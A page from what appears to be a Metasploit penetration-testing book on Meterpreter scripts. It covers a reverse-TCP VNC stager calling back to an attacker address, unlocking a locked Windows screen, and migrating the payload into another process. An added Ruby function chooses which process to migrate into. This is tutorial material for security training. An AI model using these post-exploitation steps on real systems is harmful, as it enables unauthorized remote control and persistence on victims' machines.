92
Chapter 6
Using Meterpreter Scripts
Several external Meterpreter scripts can help you to enumerate a system or
perform predefined tasks inside the Meterpreter shell. We won’t cover every
script here, but we will mention a few of the most notable ones.
NOTE
The Meterpreter scripts are in the process of being moved to post exploitation modules.
We’ll cover both scripts and post exploitation modules in this chapter.
To run a script from the Meterpreter console, enter run scriptname. The
script will either execute or provide additional help on how to run it.
Should you want to use an interactive remote GUI on the system, you
can use the VNC protocol to tunnel the active desktop communications
and interact with the GUI desktop on the target machine. But in some
cases, the system may be locked and you may be unable to access it. Never
fear: Metasploit has us covered.
In the following example, we issue the run vnc command, which installs a
VNC session on the remote system. From there, we launch run screen_unlock
to unlock the target machine so that we can view the desktop. As a result, a
VNC window should appear, showing us the target desktop.
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.33.129 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.33.129:4545...
[*] VNC Server session 2 opened (192.168.33.129:4545 -> 192.168.33.130:1091)
This will give us a VNC graphical interface to the target machine and
allow us to interact through a desktop.
meterpreter > run screen_unlock
[*] OS 'Windows XP (Build 2600, Service Pack 2).' found in known targets
[*] patching...
[*] done!
Migrating a Process
Often, when we are attacking a system through a client application such as
Internet Explorer, the Meterpreter payload runs inside the exploited process;
if the target user closes the browser, that process exits, the Meterpreter
session dies with it, and we lose our connection to the target. To avoid this
problem, we can use the migrate post exploitation module, shown next, to move
the Meterpreter server into another process that won't exit when the target
closes the browser. By migrating to a different, more stable process (one the
user is unlikely to close and that runs under a token we are allowed to open),
we keep the session alive and maintain our connection to the system. For
browser exploits it is common to automate this by setting the exploit's
AutoRunScript option to post/windows/manage/migrate, so the migration happens
as soon as the session opens rather than after we notice it.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: revterp.exe (2436)
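The module output above names the current server process but not how a "more stable" target is chosen. As an added example, not code from the book or from the Metasploit project, the Ruby below picks a migration target from a process list the way a post module would before calling client.core.migrate(pid): it skips the current process and the browser that was exploited, requires the same architecture and the same user (so the process handle can actually be opened), and then ranks survivors by a preference list, favouring the same desktop session so VNC and screenshots keep working. The hash shape mirrors what client.sys.process.get_processes returns in Metasploit, and the process list itself is constructed for this example; the hostname and the revterp.exe PID are taken from the page.

```ruby
# Added example (not from the book or from Metasploit): choose a process to
# migrate Meterpreter into from a process listing.
#
# Assumptions: each process is a Hash shaped like the elements that
# client.sys.process.get_processes returns ('pid', 'ppid', 'name', 'arch',
# 'session', 'user', 'path'). SAMPLE_PROCESSES is a constructed listing for a
# Windows XP target; only V-MAC-XP and PID 2436 come from the page.

# Long-lived, user-owned processes that survive the victim closing a browser,
# most preferred first.
DEFAULT_PREFERENCE = %w[explorer.exe svchost.exe spoolsv.exe].freeze

# Processes we never want to live in: the exploited browser and anything the
# user is likely to close.
AVOID = %w[iexplore.exe firefox.exe chrome.exe notepad.exe calc.exe].freeze

SAMPLE_PROCESSES = [
  { 'pid' => 4,    'ppid' => 0,    'name' => 'System',       'arch' => 'x86', 'session' => 0,
    'user' => '',                        'path' => '' },
  { 'pid' => 548,  'ppid' => 4,    'name' => 'smss.exe',     'arch' => 'x86', 'session' => 0,
    'user' => 'NT AUTHORITY\\SYSTEM',    'path' => '\\SystemRoot\\System32\\smss.exe' },
  { 'pid' => 848,  'ppid' => 640,  'name' => 'svchost.exe',  'arch' => 'x86', 'session' => 0,
    'user' => 'NT AUTHORITY\\SYSTEM',    'path' => 'C:\\WINDOWS\\system32\\svchost.exe' },
  { 'pid' => 1504, 'ppid' => 1468, 'name' => 'explorer.exe', 'arch' => 'x86', 'session' => 0,
    'user' => 'V-MAC-XP\\Administrator', 'path' => 'C:\\WINDOWS\\Explorer.EXE' },
  { 'pid' => 2120, 'ppid' => 1504, 'name' => 'iexplore.exe', 'arch' => 'x86', 'session' => 0,
    'user' => 'V-MAC-XP\\Administrator', 'path' => 'C:\\Program Files\\Internet Explorer\\iexplore.exe' },
  { 'pid' => 2436, 'ppid' => 2120, 'name' => 'revterp.exe',  'arch' => 'x86', 'session' => 0,
    'user' => 'V-MAC-XP\\Administrator', 'path' => 'C:\\Documents and Settings\\Administrator\\revterp.exe' },
].freeze

# Returns the best candidate Hash, or nil when nothing qualifies (in which
# case spawning a fresh process to migrate into is the safer fallback).
def pick_migration_target(procs, current_pid:, prefer: DEFAULT_PREFERENCE)
  me = procs.find { |p| p['pid'] == current_pid }
  return nil unless me

  candidates = procs.select do |p|
    p['pid'] != current_pid &&
      !AVOID.include?(p['name'].downcase) &&
      p['arch'] == me['arch'] &&   # an x86 payload stays in an x86 process
      p['user'] == me['user']      # same token, so OpenProcess will succeed
  end

  candidates.min_by do |p|
    rank = prefer.index(p['name'].downcase) || prefer.length
    # Lower is better: preference rank, then same desktop session, then
    # lowest PID as a stable tie-breaker among several svchost.exe instances.
    [rank, p['session'] == me['session'] ? 0 : 1, p['pid']]
  end
end

if __FILE__ == $PROGRAM_NAME
  target = pick_migration_target(SAMPLE_PROCESSES, current_pid: 2436)
  puts(target ? "migrate to #{target['name']} (PID #{target['pid']})" : 'no suitable target')
end
```

Running the selection against the sample listing from revterp.exe (PID 2436) lands on explorer.exe, which is what you would then pass to post/windows/manage/migrate through its PID option; from a SYSTEM-owned process it lands on svchost.exe instead, because explorer.exe belongs to a different user. When the function returns nil, letting the module spawn a new process is the right fallback rather than forcing a migration that OpenProcess will refuse.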